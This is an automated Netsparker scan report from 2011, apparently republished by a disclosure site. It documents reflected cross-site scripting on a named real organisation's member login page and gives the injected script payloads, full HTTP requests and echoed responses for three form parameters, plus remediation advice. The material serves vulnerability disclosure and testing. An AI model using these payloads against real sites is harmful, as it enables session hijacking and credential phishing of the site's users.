issac.org XSS, CWE-79, CAPEC-86 REPORT SUMMARY
Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search
XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler
Private Reporting of Security Research is preferred for Online Service Providers
Netsparker - Scan Report Summary
|
TARGET URL
|
https://www.issa.org/Members/Log-In.php
|
SCAN DATE
|
4/27/2011 4:32:46 PM
|
REPORT DATE
|
4/27/2011 5:11:41 PM
|
SCAN DURATION
|
00:07:39
|
|
19
identified
15
confirmed
0
critical
0
informational
|
GHDB DORK Tests
Scan Settings
|
PROFILE
|
Previous Settings
|
ENABLED ENGINES
|
Blind SQL Injection, Boolean SQL Injection, HTTP Header Injection, SQL Injection, Cross-site Scripting
|
|
Authentication
Scheduled
|
GHDB, DORK VULNERABILITIES
Vulnerabilities
|
|
|
GHDB, DORK VULNERABILITY SUMMARY
Vulnerability Summary
|
|
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
Parameters
Parameter
|
Type
|
Value
|
EmailAddress
|
POST
|
'"--></style></script><script>alert(0x000060)</script>
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
Username
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 241
Accept-Encoding: gzip, deflate
EmailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000060)%3c%2fscript%3e&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName=Smith&LoginType=Username&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:43 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "Username"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:block; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" checked onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="\'\"--></style></script><script>netsparker(0x000060)</script>" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class=&qu..
Parameters
Parameter
|
Type
|
Value
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
'"--></style></script><script>alert(0x000062)</script>
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
Username
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 241
Accept-Encoding: gzip, deflate
EmailAddress=netsparker%40example.com&EmailAddressReset='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000062)%3c%2fscript%3e&FirstName=Smith&LastName=Smith&LoginType=Username&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "Username"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:block; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" checked onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="\'\"--></style></script><script>netsparker(0x000062)</script>" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> <h2 class=&qu..
Parameters
Parameter
|
Type
|
Value
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
'"--></style></script><script>alert(0x000068)</script>
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
Username
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 260
Accept-Encoding: gzip, deflate
EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000068)%3c%2fscript%3e&LastName=Smith&LoginType=Username&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:32:59 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
